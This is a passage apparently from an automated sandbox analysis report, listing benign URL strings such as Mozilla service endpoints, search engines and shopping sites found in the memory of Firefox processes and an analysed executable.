Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89753000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2939160067.0000025E83995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:maybeOfferTranslations
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82433000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81CA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3081282197.0000025E83103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81CE6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3068152789.0000025E82433000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000019.00000002.3009852946.0000025E71003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/resource://activity-stream/lib/RemoteL
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000019.00000002.3081282197.0000025E8317D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000003.2958021612.0000025E83DD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: 21024c5511.exe, 0000000E.00000003.2913432713.0000000005CD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.orgupgradeTabsProgressListenercreateContentPrincipalFromOriginmigrateXULAttr
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000019.00000002.3009852946.0000025E71003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80CB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000019.00000003.2953976180.0000025E8937F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3047335193.0000025E814B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874853592.0000025E8116F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2875054403.0000025E8118A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000019.00000002.3015823343.0000025E7C9F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/http://www.mozilla.org/keymaster/gatekeeper/there
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000019.00000003.2942879261.0000025E89782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2936265181.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000019.00000003.2956378668.0000025E891CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000019.00000003.2941888477.0000025E897F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2931128411.0000025E892DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.2944330073.0000025E89758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/resource://gre/modules/GMPUtils.sys.mjsonPrefEnabledChanged(
Source: firefox.exe, 00000019.00000003.2942879261.0000025E89782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2875054403.0000025E8118A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchprincipalToInherit_base64LOAD_DOCUMENT_NEEDS_COOKIE
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D2DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000019.00000003.2936265181.0000025E89776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2944106406.0000025E8976E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000002.3020548386.0000025E7D111000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3020548386.0000025E7D1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3009852946.0000025E7106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2963429453.0000025E8261E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2968004122.0000025E826AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2968004122.0000025E826A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000019.00000002.3047335193.0000025E814E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
